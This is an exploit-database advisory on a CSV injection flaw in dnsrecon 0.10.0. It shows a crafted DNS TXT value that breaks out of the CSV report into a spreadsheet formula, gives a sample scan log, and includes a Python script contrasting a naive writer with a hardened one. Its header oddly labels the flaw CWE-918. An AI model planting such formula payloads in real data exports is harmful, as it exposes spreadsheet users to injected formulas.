dnsrecon 0.10.0 CSV Injection

CVE: CVE-2020-7922
Category: CWE-918
Price: $1000
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2021-01-08
CVSS: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H 0.55 0.924157


# Exploit Title: dnsrecon 0.10.0 - CSV Injection
# Author: Dolev Farhi
# Date: 2021-01-07
# Vendor Homepage:
# Version: 0.10.0
# Tested on: ParrotOS 4.10

dnsrecon, when scanning a TXT record such as SPF, i.e.:, outputs a CSV report (-c out.csv) with the columns Type, Name, Address, Target, Port and String.
A TXT record allows many characters, including single quotes and equals signs, so it is possible to break out of the CSV structure by creating a TXT record such as:       "test',=1+1337,'z"

user@parrot-virtual:~$ sudo dnsrecon -d -c ./file.csv -n
[*] Performing General Enumeration of Domain:
[-] DNSSEC is not configured for
[*]  SOA
[-] Could not Resolve NS Records for
[-] Could not Resolve MX Records for
[*]  TXT test',=1+1337,'z
[*] Enumerating SRV Records
[+] 0 Records Found
[*] Saving records to CSV file: ./file.csv
{'type': 'SOA', 'mname': '', 'address': ''}
{'type': 'TXT', 'name': '', 'strings': "test',=1+1337,'z"}

This output will then be rewritten into a CSV with this structure:

The flexibility of TXT records allows many variants of formulas to be injected; from RFC 1464:

Attribute Values
  All printable ASCII characters are permitted in the attribute value.
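As an added example (not dnsrecon's own code), the comma-joined writer below reproduces the column break-out described above, beside a hardened writer that uses Python's csv module so a comma inside a TXT string stays in its cell and prefixes formula-looking cells so a spreadsheet shows them as text. The records, the domain name example.test and the column set are constructed for illustration.

```python
import csv
import io

# Leading characters that spreadsheets treat as a formula (=, +, -, @)
# or that can break a cell (tab, carriage return, newline).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r", "\n")

# Constructed records shaped like dnsrecon's output above; no real domain.
RECORDS = [
    {"type": "TXT", "name": "example.test", "strings": "test',=1+1337,'z"},
    {"type": "TXT", "name": "example.test", "strings": "=1+1337"},
]
COLUMNS = ("type", "name", "strings")


def naive_csv(records):
    """Join fields with commas and no quoting: commas inside the TXT string
    become column separators, so '=1+1337' lands in a cell of its own."""
    lines = [",".join(COLUMNS)]
    for rec in records:
        lines.append(",".join(rec.get(col, "") for col in COLUMNS))
    return "\n".join(lines) + "\n"


def neutralise(cell):
    """Prefix a formula-looking cell with a single quote so spreadsheet
    software displays it as text instead of evaluating it."""
    cell = str(cell)
    if cell.startswith(FORMULA_TRIGGERS):
        return "'" + cell
    return cell


def hardened_csv(records):
    """Write with the csv module (fields containing the delimiter or quote
    character get quoted) after neutralising formula triggers."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_MINIMAL, lineterminator="\n")
    writer.writerow(COLUMNS)
    for rec in records:
        writer.writerow([neutralise(rec.get(col, "")) for col in COLUMNS])
    return buf.getvalue()


def parse_rows(text):
    """Parse CSV text back into rows, as a spreadsheet import would."""
    return list(csv.reader(io.StringIO(text)))


if __name__ == "__main__":
    print(naive_csv(RECORDS))
    print(hardened_csv(RECORDS))
```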

Copyright ©2024 Exploitalert.
